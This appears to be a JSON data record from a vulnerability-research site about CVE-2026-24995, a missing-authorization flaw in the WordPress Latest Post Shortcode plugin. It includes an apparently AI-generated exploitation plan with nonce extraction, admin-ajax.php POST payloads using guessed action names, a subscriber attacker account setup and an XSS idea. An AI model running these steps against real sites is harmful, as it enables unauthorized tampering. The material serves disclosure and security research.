[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqUrJguukFEoJV4bMCp93OOsG7696-9zvmNLD-OPPQkI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-24995","latest-post-shortcode-missing-authorization","Latest Post Shortcode \u003C= 14.2.0 - Missing Authorization","The Latest Post Shortcode plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 14.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","latest-post-shortcode",null,"\u003C=14.2.0","14.2.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-24 00:00:00","2026-02-02 20:45:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5a0aded4-b891-47d9-950e-180103b90a1c?source=api-prod",10,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-24995\n\n## 1. Vulnerability Summary\nThe **Latest Post Shortcode** plugin (versions \u003C= 14.2.0) contains a missing authorization vulnerability within its AJAX handler functions. While these functions are registered for authenticated users via `wp_ajax_`, they fail to implement necessary capability checks (e.g., `current_user_can( 'manage_options' )`). This allows any authenticated user, including those with **Subscriber-level** permissions, to invoke administrative or restricted functionality.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Authentication:** Subscriber-level access or higher is required.\n- **Vulnerable Action:** To be confirmed via discovery, but likely related to settings updates or metadata manipulation. Common candidates in this plugin type are `lps_save_settings`, `lps_update_options`, or `latest_post_shortcode_preview`.\n- **Payload:** Parameters passed via `POST` to the identified AJAX action.\n- **Preconditions:** The attacker must have a valid session cookie for a Subscriber user.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An AJAX hook is registered: `add_action( 'wp_ajax_ACTION_NAME', 'FUNCTION_NAME' );`.\n2. **Missing Check:** The callback `FUNCTION_NAME` is invoked. It likely checks a nonce using `check_ajax_referer` (providing CSRF protection) but fails to call `current_user_can()`.\n3. **Execution:** The function performs a privileged action, such as `update_option()` or modifying post data, based on the `$_POST` input.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely uses `wp_localize_script` to provide an AJAX nonce to the frontend.\n\n1. **Shortcode Identification:** Search the plugin code for `add_shortcode`. The primary shortcode is likely `[latest-post-shortcode]`.\n2. **Page Creation:** Create a post containing the shortcode to ensure scripts are enqueued:\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Nonce Page\" --post_content='[latest-post-shortcode]'\n   ```\n3. **Localization Search:** Use `grep` to find the localization key:\n   ```bash\n   grep -rn \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Flatest-post-shortcode\u002F\n   ```\n4. **Extraction:**\n   - Use `browser_navigate` to the \"Nonce Page\".\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     \u002F\u002F Example based on common naming patterns\n     window.lps_vars?.nonce || window.lps_ajax?.nonce\n     ```\n\n## 5. Exploitation Strategy\n### Phase 1: Discovery\nSearch the plugin directory to find AJAX actions lacking capability checks:\n```bash\ngrep -rn \"add_action.*wp_ajax_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Flatest-post-shortcode\u002F\n```\nOnce actions are found (e.g., `lps_save_settings`), examine the callback function for `current_user_can`.\n\n### Phase 2: Payload Delivery\nAssuming an action named `lps_save_settings` (inferred) exists:\n1. **Target:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n2. **Method:** `POST`\n3. **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n4. **Body:**\n   ```\n   action=lps_save_settings&security=[NONCE]&settings[some_option]=attacker_value\n   ```\n\n## 6. Test Data Setup\n1. **Target Plugin:** Ensure `latest-post-shortcode` v14.2.0 is installed and active.\n2. **Attacker User:**\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n3. **Victim Content:** (Optional) Create some posts for the shortcode to display.\n   ```bash\n   wp post create --post_type=post --post_title=\"Secret Post\" --post_status=publish\n   ```\n\n## 7. Expected Results\n- **Success:** The server returns a `200 OK` or a JSON success response (e.g., `{\"success\":true}`).\n- **Impact:** Settings are modified, or data is manipulated despite the user only having Subscriber permissions.\n\n## 8. Verification Steps\n1. **Check Options:** Use WP-CLI to verify if the plugin settings were altered:\n   ```bash\n   wp option get lps_settings\n   ```\n2. **Check Behavior:** If the exploit changed a display setting (e.g., custom CSS or HTML), verify the change on the frontend.\n\n## 9. Alternative Approaches\nIf the vulnerability is not in settings:\n- **Metadata Manipulation:** Look for AJAX actions that call `update_post_meta`.\n- **Information Disclosure:** Check if any AJAX actions leak post content or system information that should be restricted to admins.\n- **Shortcode Injection:** If the AJAX action allows updating the shortcode attributes globally, try injecting malicious attributes that might lead to XSS.\n\n**Note on Identifiers:** Since source was not provided, the agent MUST prioritize `grep -rn \"wp_ajax_\"` to find the exact action names (`lps_...` or `latest_post_...`) and the corresponding nonce keys in the source before attempting exploitation.","The Latest Post Shortcode plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on an AJAX handler function in versions up to, and including, 14.2.0. This allows authenticated attackers with Subscriber-level permissions to perform administrative actions, such as modifying plugin settings, by bypassing the intended authorization logic.","To exploit this vulnerability, an attacker with Subscriber-level credentials first retrieves a valid AJAX security nonce, which is typically exposed in the frontend HTML via localized scripts (e.g., variables associated with the [latest-post-shortcode] shortcode). The attacker then sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` using the vulnerable AJAX action. Because the server-side callback function only validates the nonce and fails to perform a capability check (such as current_user_can('manage_options')), the attacker can successfully execute privileged tasks, such as updating plugin configurations or manipulating metadata, by providing the appropriate parameters in the request body.","gemini-3-flash-preview","2026-05-05 00:55:24","2026-05-05 00:57:05",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","14.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatest-post-shortcode\u002Ftags\u002F14.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatest-post-shortcode.14.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatest-post-shortcode\u002Ftags\u002F14.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flatest-post-shortcode.14.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flatest-post-shortcode\u002Ftags"]